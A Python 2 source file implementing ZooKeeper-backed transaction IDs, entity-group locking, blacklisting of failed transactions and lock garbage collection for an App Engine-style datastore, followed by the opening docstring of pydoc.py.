txstr, XG_PREFIX])
def create_node(self, path, value):
""" Creates a new node in ZooKeeper, with the given value.
Args:
path: The path to create the node at.
value: The value that we should store in the node.
Raises:
ZKTransactionException: If the sequence node couldn't be created.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
self.run_with_retry(self.handle.create, path, value=str(value),
acl=ZOO_ACL_OPEN, ephemeral=False, sequence=False, makepath=True)
logging.debug("Created path {0} with value {1}".format(path, value))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't create path {0} with value {1} " \
.format(path, value))
def create_sequence_node(self, path, value):
""" Creates a new sequence node in ZooKeeper, with a non-zero initial ID.
We avoid using zero as the initial ID because Google App Engine apps can
use a zero ID as a sentinel value, to indicate that an ID should be
allocated for them.
Args:
path: The prefix to create the sequence node at. For example, a prefix
of '/abc' would result in a sequence node of '/abc1' being created.
value: The value that we should store in the sequence node.
Returns:
A long that represents the sequence ID.
Raises:
ZKTransactionException: If the sequence node couldn't be created.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
txn_id_path = self.run_with_retry(self.handle.create, path,
value=str(value), acl=ZOO_ACL_OPEN, ephemeral=False, sequence=True,
makepath=True)
if txn_id_path:
txn_id = long(txn_id_path.split(PATH_SEPARATOR)[-1].lstrip(
APP_TX_PREFIX))
if txn_id == 0:
logging.warning("Created sequence ID 0 - deleting it.")
self.run_with_retry(self.handle.delete, txn_id_path)
txn_id_path = self.run_with_retry(self.handle.create, path,
value=str(value), acl=ZOO_ACL_OPEN, ephemeral=False,
sequence=True, makepath=True)
return long(txn_id_path.split(PATH_SEPARATOR)[-1].lstrip(
APP_TX_PREFIX))
else:
logging.debug("Created sequence ID {0} at path {1}".format(txn_id,
txn_id_path))
return txn_id
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
self.reestablish_connection()
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Unable to create sequence node with path" \
" {0}, value {1}".format(path, value))
def get_transaction_id(self, app_id, is_xg=False):
"""Acquires a new id for an upcoming transaction.
Note that the caller must lock particular root entities using acquire_lock,
and that the transaction ID expires after a constant amount of time.
Args:
app_id: A str representing the application we want to perform a
transaction on.
is_xg: A bool that indicates if this transaction operates across multiple
entity groups.
Returns:
A long that represents the new transaction ID.
"""
logging.debug("Getting new transaction id for app {0}, with is_xg set " \
"to {1}".format(app_id, is_xg))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
timestamp = str(time.time())
# First, make the ZK node for the actual transaction id.
app_path = self.get_txn_path_before_getting_id(app_id)
txn_id = self.create_sequence_node(app_path, timestamp)
# Next, make the ZK node that indicates if this a XG transaction.
if is_xg:
xg_path = self.get_xg_path(app_id, txn_id)
self.create_node(xg_path, timestamp)
logging.debug("Returning transaction ID {0} with timestamp {1} for " \
"app_id {2}, with is_xg set to {3}".format(txn_id, timestamp, app_id,
is_xg))
return txn_id
def check_transaction(self, app_id, txid):
""" Gets the status of the given transaction.
Args:
app_id: A str representing the application whose transaction we wish to
query.
txid: An int that indicates the transaction ID we should query.
Returns:
True if the transaction is in progress.
Raises:
ZKTransactionException: If the transaction is not in progress, or it
has timed out.
"""
logging.debug("Checking transaction for app {0}, transaction id {1}".format(
app_id, txid))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
txpath = self.get_transaction_path(app_id, txid)
try:
if self.is_blacklisted(app_id, txid):
raise ZKTransactionException("Transaction {0} timed out.".format(txid))
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't see if transaction {0} is valid" \
.format(txid))
try:
if not self.run_with_retry(self.handle.exists, txpath):
logging.debug("[check_transaction] {0} does not exist".format(txpath))
raise ZKTransactionException("Transaction {0} is not valid." \
.format(txid))
return True
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't see if transaction {0} is valid" \
.format(txid))
def is_in_transaction(self, app_id, txid, retries=5):
""" Checks to see if the named transaction is currently running.
Args:
app_id: A str representing the application whose transaction we wish to
query.
txid: An int that indicates the transaction ID we should query.
Returns:
True if the transaction is in progress, and False otherwise.
Raises:
ZKTransactionException: If the transaction is blacklisted.
ZKInternalException: If there was an error seeing if the transaction was
blacklisted.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
tx_lock_path = self.get_transaction_lock_list_path(app_id, txid)
if self.is_blacklisted(app_id, txid):
raise ZKTransactionException(
'Transaction {} is blacklisted'.format(txid))
try:
if not self.run_with_retry(self.handle.exists, tx_lock_path):
logging.debug("[is_in_transaction] {0} does not exist".format(
tx_lock_path))
return False
logging.debug("{0} does exist and is not blacklisted".format(
tx_lock_path))
return True
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
if retries > 0:
logging.info('Trying again to see if we are in transaction {} '
'with retry #{}'.format(txid, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.is_in_transaction(app_id=app_id, txid=txid,
retries=retries - 1)
self.reestablish_connection()
raise ZKInternalException("Couldn't see if we are in transaction {0}" \
.format(txid))
def is_orphan_lock(self, tx_lockpath):
""" Checks to see if a lock does not have a transaction linked.
If the groomer misses to unlock a lock for whatever reason, we need
to make sure the lock is eventually released.
Args:
tx_lockpath: A str, the path to the transaction using the lock.
Returns:
True if the lock is an orphan, and False otherwise.
"""
try:
self.handle.get(tx_lockpath)
return False
except kazoo.exceptions.NoNodeError:
return True
def acquire_additional_lock(self, app_id, txid, entity_key, create):
""" Acquire an additional lock for a cross group transaction.
Args:
app_id: A str representing the application ID.
txid: The transaction ID you are acquiring a lock for. Built into
the path.
entity_key: Used to get the root path.
create: A bool that indicates if we should create a new Zookeeper node
to store the lock information in.
Returns:
Boolean, of true on success, false if lock can not be acquired.
Raises:
ZKTransactionException: If we can't acquire the lock for the given
entity group, because a different transaction already has it.
"""
logging.debug("Acquiring additional lock for appid {0}, transaction id " \
"{1}, entity key {2}, with create {3}".format(app_id, txid, entity_key,
create))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
txpath = self.get_transaction_path(app_id, txid)
lockrootpath = self.get_lock_root_path(app_id, entity_key)
lockpath = None
try:
logging.debug("Trying to create path {0} with value {1}".format(
lockrootpath, txpath))
lockpath = self.run_with_retry(self.handle.create, lockrootpath,
value=str(txpath), acl=ZOO_ACL_OPEN, ephemeral=False,
sequence=False, makepath=True)
except kazoo.exceptions.NodeExistsError:
# fail to get lock
try:
tx_lockpath = self.run_with_retry(self.handle.get, lockrootpath)[0]
logging.error("Lock {0} in use by {1}".format(lockrootpath,
tx_lockpath))
if self.is_orphan_lock(tx_lockpath):
logging.error("Lock {0} is an orphan lock. Releasing it".format(
lockrootpath))
# Releasing the lock in question.
self.handle.delete(lockrootpath)
# Try to acquire the lock again.
return self.acquire_additional_lock(app_id, txid, entity_key, create)
except kazoo.exceptions.NoNodeError:
# If the lock is released by another thread this can get tossed.
# A race condition.
logging.warning("Lock {0} was in use but was released"\
.format(lockrootpath))
raise ZKTransactionException("acquire_additional_lock: There is " \
"already another transaction using {0} lock".format(lockrootpath))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't get a lock at path {0}" \
.format(lockrootpath))
logging.debug("Created new lock root path {0} with value {1}".format(
lockrootpath, txpath))
transaction_lock_path = self.get_transaction_lock_list_path(app_id, txid)
try:
if create:
self.run_with_retry(self.handle.create_async, transaction_lock_path,
value=str(lockpath), acl=ZOO_ACL_OPEN, ephemeral=False,
makepath=False, sequence=False)
logging.debug("Created lock list path {0} with value {1}".format(
transaction_lock_path, lockpath))
else:
tx_lockpath = self.run_with_retry(self.handle.get,
transaction_lock_path)[0]
lock_list = tx_lockpath.split(LOCK_LIST_SEPARATOR)
lock_list.append(lockpath)
lock_list_str = LOCK_LIST_SEPARATOR.join(lock_list)
self.run_with_retry(self.handle.set_async, transaction_lock_path,
str(lock_list_str))
logging.debug("Set lock list path {0} to value {1}".format(
transaction_lock_path, lock_list_str))
# We do this check last, otherwise we may have left over locks to
# to a lack of a lock path reference.
if len(lock_list) > MAX_GROUPS_FOR_XG:
raise ZKBadRequest("acquire_additional_lock: Too many " \
"groups for this XG transaction.")
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't create or set a lock at path {0}" \
.format(transaction_lock_path))
return True
def is_xg(self, app_id, tx_id):
""" Checks to see if the transaction can operate over multiple entity
groups.
Args:
app_id: The application ID that the transaction operates over.
tx_id: The transaction ID that may or may not be XG.
Returns:
True if the transaction is XG, False otherwise.
Raises:
ZKTransactionException: on ZooKeeper exceptions.
ZKInternalException: If we can't tell if the transaction is a XG
transaction or not.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
return self.run_with_retry(self.handle.exists, self.get_xg_path(app_id,
tx_id))
except kazoo.exceptions.ZookeeperError as zk_exception:
raise ZKTransactionException("ZooKeeper exception:{0}"\
.format(zk_exception))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKInternalException("Couldn't see if transaction {0} was XG " \
"for app {1}".format(tx_id, app_id))
def acquire_lock(self, app_id, txid, entity_key):
""" Acquire lock for transaction. It will acquire additional locks
if the transactions is XG.
You must call get_transaction_id() first to obtain transaction ID.
You could call this method anytime if the root entity key is same,
or different in the case of it being XG.
Args:
app_id: The application ID to acquire a lock for.
txid: The transaction ID you are acquiring a lock for. Built into
the path.
entity_key: Used to get the root path.
Returns:
True on success, False otherwise.
Raises:
ZKTransactionException: If it could not get the lock.
"""
logging.debug("Acquiring lock for appid {0}, transaction id {1}, " \
"entity key {2}".format(app_id, txid, entity_key))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
lockrootpath = self.get_lock_root_path(app_id, entity_key)
try:
if self.is_in_transaction(app_id, txid): # use current lock
transaction_lock_path = self.get_transaction_lock_list_path(
app_id, txid)
prelockpath = self.run_with_retry(self.handle.get,
transaction_lock_path)[0]
lock_list = prelockpath.split(LOCK_LIST_SEPARATOR)
logging.debug("Lock list: {0}".format(lock_list))
if lockrootpath in lock_list:
logging.debug("Already has lock: {0}".format(lockrootpath))
return True
else:
if self.is_xg(app_id, txid):
return self.acquire_additional_lock(app_id, txid, entity_key,
create=False)
else:
raise ZKBadRequest("acquire_lock: You can not lock " \
"different root entity in non-cross-group transaction.")
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
raise ZKTransactionException("An internal exception prevented us from " \
"getting the lock for app id {0}, txid {1}, entity key {2}" \
.format(app_id, txid, entity_key))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't get lock for app id {0}, txid " \
"{1}, entity key {2}".format(app_id, txid, entity_key))
return self.acquire_additional_lock(app_id, txid, entity_key, create=True)
def get_updated_key_list(self, app_id, txid):
""" Gets a list of keys updated in this transaction.
Args:
app_id: A str corresponding to the application ID whose transaction we
wish to query.
txid: The transaction ID that we want to get a list of updated keys for.
Returns:
A list of (keys, txn_id) that have been updated in this transaction.
Raises:
ZKTransactionException: If the given transaction ID does not correspond
to a transaction that is currently in progress.
"""
txpath = self.get_transaction_path(app_id, txid)
try:
child_list = self.run_with_retry(self.handle.get_children, txpath)
keylist = []
for item in child_list:
if re.match("^" + TX_UPDATEDKEY_PREFIX, item):
keyandtx = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([txpath, item]))[0]
key = urllib.unquote_plus(keyandtx.split(PATH_SEPARATOR)[0])
txn_id = urllib.unquote_plus(keyandtx.split(PATH_SEPARATOR)[1])
keylist.append((key, txn_id))
return keylist
except kazoo.exceptions.NoNodeError:
raise ZKTransactionException("get_updated_key_list: Transaction ID {0} " \
"is not valid.".format(txid))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't get updated key list for appid " \
"{0}, txid {1}".format(app_id, txid))
def release_lock(self, app_id, txid):
""" Releases all locks acquired during this transaction.
Callers must call acquire_lock before calling release_lock. Upon calling
release_lock, the given transaction ID is no longer valid.
Args:
app_id: The application ID we are releasing a lock for.
txid: The transaction ID we are releasing a lock for.
Returns:
True if the locks were released.
Raises:
ZKTransactionException: If any locks acquired during this transaction
could not be released.
"""
logging.debug("Releasing locks for app {0}, with transaction id {1} " \
.format(app_id, txid))
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
self.check_transaction(app_id, txid)
txpath = self.get_transaction_path(app_id, txid)
transaction_lock_path = self.get_transaction_lock_list_path(app_id, txid)
try:
lock_list_str = self.run_with_retry(self.handle.get,
transaction_lock_path)[0]
lock_list = lock_list_str.split(LOCK_LIST_SEPARATOR)
for lock_path in lock_list:
logging.debug("Lock released: {0}".format(lock_path))
self.run_with_retry(self.handle.delete, lock_path)
self.run_with_retry(self.handle.delete, transaction_lock_path)
except kazoo.exceptions.NoNodeError:
try:
if self.is_blacklisted(app_id, txid):
raise ZKTransactionException(
"Unable to release lock {0} for app id {1}" \
.format(transaction_lock_path, app_id))
else:
return True
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
raise ZKTransactionException("Internal exception prevented us from " \
"releasing lock {0} for app id {1}".format(transaction_lock_path,
app_id))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKTransactionException("Couldn't release lock {0} for appid {1}" \
.format(transaction_lock_path, app_id))
try:
if self.is_xg(app_id, txid):
xg_path = self.get_xg_path(app_id, txid)
self.run_with_retry(self.handle.delete, xg_path)
for child in self.run_with_retry(self.handle.get_children, txpath):
logging.debug("Removing lock: {0}".format(PATH_SEPARATOR.join(
[txpath, child])))
self.run_with_retry(self.handle.delete, PATH_SEPARATOR.join(
[txpath, child]))
# This deletes the transaction root path.
self.run_with_retry(self.handle.delete, txpath)
except ZKInternalException as zk_exception:
# Although there was a failure doing the async deletes, since we've
# already released the locks above, we can safely return True here.
logging.exception(zk_exception)
self.reestablish_connection()
return True
except kazoo.exceptions.KazooException as kazoo_exception:
# Although there was a failure doing the async deletes, since we've
# already released the locks above, we can safely return True here.
logging.exception(kazoo_exception)
self.reestablish_connection()
return True
return True
def is_blacklisted(self, app_id, txid, retries=5):
""" Checks to see if the given transaction ID has been blacklisted (that is,
if it is no longer considered to be a valid transaction).
Args:
app_id: The application ID whose transaction ID we want to validate.
txid: The transaction ID that we want to validate.
Returns:
True if the transaction is blacklisted, False otherwise.
Raises:
ZKInternalException: If we couldn't determine if the transaction was
blacklisted or not.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
blacklist_root = self.get_blacklist_root_path(app_id)
blacklist_txn = PATH_SEPARATOR.join([blacklist_root,
str(txid)])
return self.run_with_retry(self.handle.exists, blacklist_txn)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
if retries > 0:
logging.info('Trying again to see if transaction {} is blacklisted '
'with retry #{}'.format(txid, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.is_blacklisted(app_id=app_id, txid=txid,
retries=retries - 1)
self.reestablish_connection()
raise ZKInternalException("Couldn't see if appid {0}'s transaction, " \
"{1}, is blacklisted.".format(app_id, txid))
def get_valid_transaction_id(self, app_id, target_txid, entity_key):
""" This returns valid transaction id for the entity key.
Args:
app_id: A str representing the application ID.
target_txid: The transaction id that we want to check for validness.
entity_key: The entity that the transaction operates over.
Returns:
A long containing the latest valid transaction id, or zero if there is
none.
Raises:
ZKInternalException: If we couldn't get a valid transaction ID.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
# If this is an ongoing transaction give the previous value.
try:
if self.is_in_transaction(app_id, target_txid):
key_list = self.get_updated_key_list(app_id, target_txid)
for (key, txn_id) in key_list:
if entity_key == key:
return long(txn_id)
except ZKTransactionException, zk_exception:
# If the transaction is blacklisted.
# Get the valid id.
vtxpath = self.get_valid_transaction_path(app_id, entity_key)
try:
return long(self.run_with_retry(self.handle.get, vtxpath)[0])
except kazoo.exceptions.NoNodeError:
# Blacklisted and without a valid ID.
return long(0)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKInternalException("Couldn't get valid transaction id for " \
"app {0}, target txid {1}, entity key {2}".format(app_id, target_txid,
entity_key))
# The given target ID is not blacklisted or in an ongoing transaction.
return target_txid
def register_updated_key(self, app_id, current_txid, target_txid, entity_key):
""" Registers a key which is a part of a transaction. This is to know
what journal version we must rollback to upon failure.
Args:
app_id: A str representing the application ID.
current_txid: The current transaction ID for which we'll rollback to upon
failure.
target_txid: A long transaction ID we are rolling forward to.
entity_key: A str key we are registering.
Returns:
True on success.
Raises:
ZKTransactionException: If the transaction is not valid.
ZKInternalException: If we were unable to register the key.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
vtxpath = self.get_valid_transaction_path(app_id, entity_key)
try:
if self.run_with_retry(self.handle.exists, vtxpath):
# Update the transaction ID for entity if there is valid transaction.
self.run_with_retry(self.handle.set_async, vtxpath, str(target_txid))
else:
# Store the updated key info into the current transaction node.
value = PATH_SEPARATOR.join([urllib.quote_plus(entity_key),
str(target_txid)])
txpath = self.get_transaction_path(app_id, current_txid)
if self.run_with_retry(self.handle.exists, txpath):
self.handle.create_async(PATH_SEPARATOR.join([txpath,
TX_UPDATEDKEY_PREFIX]), value=str(value), acl=ZOO_ACL_OPEN,
ephemeral=False, sequence=True, makepath=False)
else:
raise ZKTransactionException("Transaction {0} is not valid.".format(
current_txid))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
raise ZKInternalException("Couldn't register updated key for app " \
"{0}, current txid {1}, target txid {2}, entity_key {3}".format(app_id,
current_txid, target_txid, entity_key))
return True
def notify_failed_transaction(self, app_id, txid):
""" Marks the given transaction as failed, invalidating its use by future
callers.
This function also cleans up successful transactions that have expired.
Args:
app_id: The application ID whose transaction we wish to invalidate.
txid: An int representing the transaction ID we wish to invalidate.
Returns:
True if the transaction was invalidated, False otherwise.
"""
logging.debug("Notify failed transaction app: {0}, txid: {1}"\
.format(app_id, str(txid)))
lockpath = None
lock_list = []
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
txpath = self.get_transaction_path(app_id, txid)
try:
lockpath = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([txpath, TX_LOCK_PATH]))[0]
lock_list = lockpath.split(LOCK_LIST_SEPARATOR)
except kazoo.exceptions.NoNodeError:
# There is no need to rollback because there is no lock.
logging.debug("There is no lock for transaction {0}.".format(txid))
pass
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
try:
if lock_list:
# Add the transaction ID to the blacklist.
now = str(time.time())
blacklist_root = self.get_blacklist_root_path(app_id)
if not self.run_with_retry(self.handle.exists, blacklist_root):
self.handle.create(blacklist_root, value=DEFAULT_VAL,
acl=ZOO_ACL_OPEN, ephemeral=False, sequence=False, makepath=True)
self.handle.create_async(PATH_SEPARATOR.join([blacklist_root,
str(txid)]), value=now, acl=ZOO_ACL_OPEN)
children = []
try:
children = self.run_with_retry(self.handle.get_children, txpath)
except kazoo.exceptions.NoNodeError:
pass
# Copy valid transaction ID for each updated key into valid list.
for child in children:
if re.match("^" + TX_UPDATEDKEY_PREFIX, child):
value = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([txpath, child]))[0]
valuelist = value.split(PATH_SEPARATOR)
key = urllib.unquote_plus(valuelist[0])
vid = valuelist[1]
vtxroot = self.get_valid_transaction_root_path(app_id)
if not self.run_with_retry(self.handle.exists, vtxroot):
self.run_with_retry(self.handle.create, vtxroot, DEFAULT_VAL,
ZOO_ACL_OPEN, False, False, True)
vtxpath = self.get_valid_transaction_path(app_id, key)
self.run_with_retry(self.handle.create_async, vtxpath, str(vid),
ZOO_ACL_OPEN)
# Release the locks.
for lock in lock_list:
try:
self.run_with_retry(self.handle.delete, lock)
except kazoo.exceptions.NoNodeError:
# Try to delete all nodes, so skip any failure to release a lock.
pass
if self.is_xg(app_id, txid):
try:
self.run_with_retry(self.handle.delete, self.get_xg_path(app_id,
txid))
except kazoo.exceptions.NoNodeError:
logging.error("No node error when trying to remove {0}".format(txid))
# Remove the transaction paths.
for item in self.run_with_retry(self.handle.get_children, txpath):
try:
self.run_with_retry(self.handle.delete,
PATH_SEPARATOR.join([txpath, item]))
except kazoo.exceptions.NoNodeError:
logging.error("No node error when trying to remove {0}".format(txid))
logging.debug("Notify failed transaction removing lock: {0}".\
format(txpath))
self.run_with_retry(self.handle.delete, txpath)
except ZKInternalException as zk_exception:
logging.exception(zk_exception)
return False
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
return True
def reestablish_connection(self):
""" Checks the connection and resets it as needed. """
logging.warning("Re-establishing ZooKeeper connection.")
try:
self.handle.restart()
self.needs_connection = False
self.failure_count = 0
logging.info("Restarted ZK connection successfully.")
return
except kazoo.exceptions.ZookeeperError as close_exception:
logging.warning("Unable to restart ZK connection. Creating a new one.")
logging.exception(close_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.warning("Unable to restart ZK connection. Creating a new one.")
logging.exception(kazoo_exception)
except Exception as exception:
logging.warning("Unable to restart ZK connection. Creating a new one.")
logging.exception(exception)
try:
self.handle.stop()
except kazoo.exceptions.ZookeeperError as close_exception:
logging.error("Issue stopping ZK connection.")
logging.exception(close_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.error("Issue stopping ZK connection.")
logging.exception(kazoo_exception)
except Exception as exception:
logging.error("Issue stopping ZK connection.")
logging.exception(exception)
try:
self.handle.close()
except kazoo.exceptions.ZookeeperError as close_exception:
logging.error("Issue closing ZK connection.")
logging.exception(close_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.error("Issue closing ZK connection.")
logging.exception(kazoo_exception)
except Exception as exception:
logging.error("Issue closing ZK connection.")
logging.exception(exception)
logging.warning("Creating a new connection to ZK")
reconnect_error = False
self.handle = kazoo.client.KazooClient(hosts=self.host,
max_retries=self.DEFAULT_NUM_RETRIES, timeout=self.DEFAULT_ZK_TIMEOUT)
try:
self.handle.start()
except kazoo.exceptions.KazooException as kazoo_exception:
reconnect_error = True
logging.exception(kazoo_exception)
except Exception as exception:
reconnect_error = True
logging.exception(exception)
if reconnect_error:
logging.error("Error re-establishing ZooKeeper connection!")
self.needs_connection = True
self.failure_count += 1
else:
logging.info("Successfully created a new connection")
self.needs_connection = False
self.failure_count = 0
if self.failure_count > self.MAX_CONNECTION_FAILURES:
logging.critical("Too many connection errors to ZooKeeper. Aborting")
sys.exit(1)
def gc_runner(self):
""" Transaction ID garbage collection (GC) runner.
Note: This must be running as separate thread.
"""
logging.debug("Starting GC thread.")
while self.gc_running:
# Scan each application's last GC time.
try:
app_list = self.run_with_retry(self.handle.get_children, APPS_PATH)
for app in app_list:
app_id = urllib.unquote_plus(app)
# App is already encoded, so we should not use
# self.get_app_root_path.
app_path = PATH_SEPARATOR.join([APPS_PATH, app])
self.try_garbage_collection(app_id, app_path)
except kazoo.exceptions.NoNodeError:
# There were no nodes for this application.
pass
except kazoo.exceptions.OperationTimeoutError as ote:
logging.warning("GC operation timed out while trying to get {0}"\
" with {1}".format(APPS_PATH, str(ote)))
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
except Exception as exception:
logging.error("UNKNOWN EXCEPTION")
logging.exception(exception)
self.reestablish_connection()
with self.gc_cv:
self.gc_cv.wait(GC_INTERVAL)
logging.debug("Stopping GC thread.")
def try_garbage_collection(self, app_id, app_path):
""" Try to garbage collect timed out transactions.
Args:
app_id: The application ID.
app_path: The application path for which we're garbage collecting.
Returns:
True if the garbage collector ran, False otherwise.
"""
last_time = 0
try:
val = self.run_with_retry(self.handle.get,
PATH_SEPARATOR.join([app_path, GC_TIME_PATH]))[0]
last_time = float(val)
except kazoo.exceptions.NoNodeError:
last_time = 0
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
# If the last time plus our GC interval is less than the current time,
# that means its time to run the GC again.
if last_time + GC_INTERVAL < time.time():
gc_path = PATH_SEPARATOR.join([app_path, GC_LOCK_PATH])
try:
now = str(time.time())
# Get the global GC lock.
self.run_with_retry(self.handle.create, gc_path, value=now,
acl=ZOO_ACL_OPEN, ephemeral=True)
try:
self.execute_garbage_collection(app_id, app_path)
# Update the last time when the GC was successful.
now = str(time.time())
self.update_node(PATH_SEPARATOR.join([app_path, GC_TIME_PATH]), now)
except Exception as exception:
logging.exception(exception)
# Release the lock.
self.run_with_retry(self.handle.delete, gc_path)
except kazoo.exceptions.NodeExistsError:
# Failed to obtain the GC lock. Try again later.
pass
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
return True
return False
def get_lock_with_path(self, path):
""" Tries to get the lock based on path.
Args:
path: A str, the lock path.
Returns:
True if the lock was obtained, False otherwise.
"""
try:
now = str(time.time())
self.run_with_retry(self.handle.create, path, value=now,
acl=ZOO_ACL_OPEN, ephemeral=True)
except kazoo.exceptions.NoNodeError:
logging.error("Couldn't create path {0}".format(path))
return False
except kazoo.exceptions.NodeExistsError:
return False
except kazoo.exceptions.SystemZookeeperError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except SystemError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
return True
def release_lock_with_path(self, path):
""" Releases lock based on path.
Args:
path: A str, the lock path.
Returns:
True on success, False on system failures.
Raises:
ZKTransactionException: If the lock could not be released.
"""
try:
self.run_with_retry(self.handle.delete, path)
except kazoo.exceptions.NoNodeError:
raise ZKTransactionException("Unable to delete lock: {0}".format(path))
except kazoo.exceptions.SystemZookeeperError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return False
except SystemError as sys_exception:
logging.exception(sys_exception)
self.reestablish_connection()
return False
except Exception as exception:
logging.exception(exception)
self.reestablish_connection()
return False
return True
def execute_garbage_collection(self, app_id, app_path):
""" Execute garbage collection for an application.
Args:
app_id: The application ID.
app_path: The application path.
"""
start = time.time()
# Get the transaction ID list.
txrootpath = PATH_SEPARATOR.join([app_path, APP_TX_PATH])
try:
txlist = self.run_with_retry(self.handle.get_children, txrootpath)
except kazoo.exceptions.NoNodeError:
# there is no transaction yet.
return
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return
except Exception as exception:
logging.error("UNKNOWN EXCEPTION")
logging.exception(exception)
self.reestablish_connection()
return
# Verify the time stamp of each transaction.
for txid in txlist:
if not re.match("^" + APP_TX_PREFIX + '\d', txid):
logging.debug("Skipping {0} because it is not a transaction.".format(
txid))
continue
txpath = PATH_SEPARATOR.join([txrootpath, txid])
try:
txtime = float(self.run_with_retry(self.handle.get, txpath)[0])
# If the timeout plus our current time is in the future, then
# we have not timed out yet.
if txtime + TX_TIMEOUT < time.time():
self.notify_failed_transaction(app_id, long(txid.lstrip(
APP_TX_PREFIX)))
except kazoo.exceptions.NoNodeError:
# Transaction id disappeared during garbage collection.
# The transaction may have finished successfully.
pass
except kazoo.exceptions.ZookeeperError as zk_exception:
logging.exception(zk_exception)
self.reestablish_connection()
return
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
return
except Exception as exception:
logging.error("UNKNOWN EXCEPTION")
logging.exception(exception)
self.reestablish_connection()
return
logging.debug("Lock GC took {0} seconds.".format(str(time.time() - start)))
|
pydoc.py
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
"""Generate Python documentation in HTML or text for interactive use.
In the Python interpreter, do "from pydoc import help" to provide online
help. Calling help(thing) on a Python object documents the object.
Or, at the shell command line outside of Python:
Run "pydoc <name>" to show documentation on something. <name> may be
the name of a function, module, package, or a dotted reference to a
class or function within a module or module in a package. If the
argument contains a path segment delimiter (e.g. slash on Unix,
backslash on Windows) it is treated as the path to a Python source file.
Run "pydoc -k <keyword>" to search for a keyword in the synopsis lines
of all available modules.
Run "pydoc -p <port>" to start an HTTP server on a given port on the
local machine to generate documentation web pages.
For platforms without a command line, "pydoc -g" starts the HTTP server
